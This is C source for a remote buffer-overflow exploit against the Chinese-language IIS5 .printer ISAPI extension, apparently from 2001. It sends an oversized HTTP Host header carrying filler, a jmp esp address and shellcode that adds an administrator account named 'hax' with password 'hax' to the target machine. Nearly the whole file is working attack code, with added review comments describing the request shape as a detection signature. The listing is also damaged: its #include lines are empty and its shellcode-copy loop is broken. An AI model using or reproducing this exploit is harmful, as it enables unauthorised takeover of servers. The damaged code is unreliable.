/*************************************************************/
/* IIS5 中文版.printer远程攻击程序 */
/* 在Win2k Advanced Server(中文版,5.00.2195)上测试成功 */
/* 使用方法:cniis [sp type] */
/* sp type: 0 ---- no SP (default) */
/* 1 ---- SP1 */
/* 如果攻击成功,会在攻击目标机上添加一个Administrators组的 */
/* 用户:hax,密码:hax */
/* */
/* v0.2 增加了对SP1的攻击支持 */
/* */
/* http://isno.yeah.net */
/*************************************************************/
#include
#include
#include
#include
#include
void usage(char* prog);
/*
 * Entry point. Builds one HTTP request in sploit[] and sends it to the
 * host named in argv[1] on TCP port 80; an optional argv[2] selects
 * which 4-byte value is placed after the filler (see the sp branch).
 *
 * Shape of the request as assembled below (this is also what a network
 * or IDS signature for this traffic keys on):
 *   "GET /NULL.printer HTTP/1.0\r\n"
 *   "Host: " + 268 bytes of 0x90 + 4 sp-dependent bytes + 4 bytes of 0x90
 *            + the shellcode bytes + "\r\n\r\n"
 * i.e. a request for the .printer ISAPI extension carrying a Host header
 * several hundred bytes long. sploit[857] is the only bound on this
 * construction; nothing checks that the writes through `finger` stay
 * inside it.
 *
 * This listing is extraction-damaged as printed: the #include lines
 * above name no header, and the for-loop condition at the shellcode
 * copy is not a valid termination test as written. It therefore does
 * not compile as shown and is left byte-for-byte as found. The program
 * is Win32-only (WSAStartup, closesocket, Sleep).
 */
int main (int argc, char *argv[])
{
/* This shellcode add a Administrators User hax */
/* hax's password is also hax, write by isno,5.2001 */
/* Raw payload bytes, copied verbatim into the request after the filler. */
unsigned char shellcode[] =
"\x90\x55\x53\x8B\xEC\x33\xDB\x53\x83\xEC\x3C\xB8"
"\x6E\x65\x74\x20\x89\x45\xC3\xB8\x75\x73\x65\x72"
"\x89\x45\xC7\xB8\x20\x68\x61\x78\x89\x45\xCB\x89"
"\x45\xCF\xB8\x20\x2F\x61\x64\x89\x45\xD3\xB8\x64"
"\x26\x6E\x65\x89\x45\xD7\xB8\x74\x20\x6C\x6F\x89"
"\x45\xDB\xB8\x63\x61\x6C\x67\x89\x45\xDF\xB8\x72"
"\x6F\x75\x70\x89\x45\xE3\xB8\x20\x41\x64\x6D\x89"
"\x45\xE7\xB8\x69\x6E\x69\x73\x89\x45\xEB\xB8\x74"
"\x72\x61\x74\x89\x45\xEF\xB8\x6F\x72\x73\x20\x89"
"\x45\xF3\xB8\x68\x61\x78\x20\x89\x45\xF7\xB8\x2F"
"\x61\x64\x64\x89\x45\xFB\x8D\x45\xC3\x50\xB8\xAD"
"\xAA\x01\x78\xFF\xD0\x8B\xE5\x5B\x5D\x03\x03\x03";
/* Request buffer; zeroed below, then filled sequentially via `finger`. */
char sploit[857];
/* Request line; the 26 bytes copied into sploit[0..25] by strcpy below. */
char request[]="GET /NULL.printer HTTP/1.0";
char *finger;
int i,X,sock;
/* Service-pack selector: 0 (default) or the value of argv[2]. */
int sp=0;
unsigned short serverport=htons(80);
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr attack;
WORD werd;
WSADATA wsd;
/* Winsock 2.0 initialisation; the return value is not checked. */
werd= MAKEWORD(2,0);
WSAStartup(werd,&wsd);
/* usage() calls exit(), so execution only continues with 2 or 3 args. */
if(argc<2||argc>3) usage(argv[0]);
/* atoi() gives 0 for non-numeric input, which silently selects the sp==0 path. */
if(argc==3) sp=atoi(argv[2]);
/* Resolve the target; a failed lookup returns NULL and the memcpy below would dereference it. */
nametocheck = gethostbyname (argv[1]);
memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
memset(sploit,0x00,857);
strcpy(sploit,request);
/* Append CRLF and the "Host: " header name directly after the request line. */
finger=&sploit[26];
*(finger++)=0x0d;
*(finger++)=0x0a;
*(finger++)='H';
*(finger++)='o';
*(finger++)='s';
*(finger++)='t';
*(finger++)=':';
*(finger++)=' ';
/* 268 filler bytes (0x90) as the Host header value. */
for(i=0;i<268;i++)
*(finger++)=(char)0x90;
/* 4 bytes chosen by the sp argument; the author's comment below identifies
 * the sp==0 value as an address in User32.dll build 5.0.2180.1. */
if(sp==0)
{
/* jmp esp in User32.dll(5.0.2180.1)*/
*(finger++)=(char)0x2a;
*(finger++)=(char)0xe3;
*(finger++)=(char)0xe2;
*(finger++)=(char)0x77;
}
else
{
*(finger++)=(char)0x8b;
*(finger++)=(char)0x89;
*(finger++)=(char)0xe6;
*(finger++)=(char)0x77;
}
/* 4 more filler bytes, then the shellcode. */
*(finger++)=(char)0x90;
*(finger++)=(char)0x90;
*(finger++)=(char)0x90;
*(finger++)=(char)0x90;
/* NOTE(review): as printed, this loop condition and the assignment do not
 * index the array; this is extraction damage in the listing, left as found. */
for(i=0;shellcode!=0x00;i++)
*(finger++)=shellcode;
/* End of the Host header and end of the header block (CRLF CRLF), then a terminator. */
*(finger++)=0x0d;
*(finger++)=0x0a;
*(finger++)=0x0d;
*(finger++)=0x0a;
*(finger++)=0x00;
/* printf(sploit); */
/* Plain TCP connect to port 80; socket() failure is not checked before connect(). */
sock = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr = attack.s_addr;
serv_addr.sin_port = serverport;
X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
if(X!=0)
{
/* The format string has no conversion for the inet_ntoa() argument, so the address is never printed. */
printf("Couldn't connect\n",inet_ntoa(attack));
exit(1);
}
/* Single send of the request up to the first NUL; the return value is not checked,
 * and no response is read. */
send(sock, sploit, strlen(sploit),0);
/* Win32 Sleep(): one second. */
Sleep(1000);
printf("\nSP type: %d\n",sp);
printf("\nShellcode sended!\n");
printf("If success,the target host will add a Admin User named hax,its passwd is hax.\n");
printf("Good luck!!!\n\n");
closesocket(sock);
return 0;
}
/*
 * Print the command-line help to stdout and terminate the process with
 * exit status 1. `prog` is the program name as invoked (argv[0]).
 * Does not return.
 */
void usage(char* prog)
{
printf("\n%s -- IIS5 Chinese version .printer remote exploit\n", prog);
fputs(" write by isno \n\n", stdout);
printf("Usage: %s [sp type] \n", prog);
fputs("sp type: 0 ---- no SP (default) \n", stdout);
fputs(" 1 ---- SP1 \n", stdout);
exit(1);
}